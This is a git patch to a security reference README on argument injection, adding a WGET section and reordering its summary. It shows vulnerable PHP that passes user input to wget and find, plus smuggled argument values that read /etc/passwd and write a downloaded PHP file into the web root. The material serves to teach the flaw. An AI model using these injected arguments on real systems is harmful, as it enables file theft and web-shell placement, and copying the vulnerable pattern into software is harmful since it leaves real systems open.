From 5e3d1d80c8ed783582bb3a9e6903b6908617e140 Mon Sep 17 00:00:00 2001
From: gdraperi <33750242+gdraperi@users.noreply.github.com>
Date: Tue, 11 Oct 2022 17:29:53 +0200
Subject: [PATCH] Update README.md

Adding the WGET command and fixing errors in the summary part.
---
 Argument Injection/README.md | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/Argument Injection/README.md b/Argument Injection/README.md
index acaa3b7..8c6f46d 100644
--- a/Argument Injection/README.md	
+++ b/Argument Injection/README.md	
@@ -30,8 +30,9 @@ We can see by printing the command that all the parameters are splited allowing
 ## Summary
 
 * [List of exposed commands](#list-of-exposed-commands)
-  * [TAR](#TAR)
   * [CURL](#CURL)
+  * [TAR](#TAR)
+  * [FIND] (#FIND)
   * [WGET](#WGET)
 * [References](#references)
 
@@ -81,6 +82,16 @@ $file = "sth -or -exec cat /etc/passwd ; -quit";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 
+### WGET
+Example of vulnerable code
+```php
+system(escapeshellcmd('wget '.$url));
+```
+Arbitrary file write
+```php
+$url = '--directory-prefix=/var/www/html http://example.com/example.php';
+```
+
 
 ## References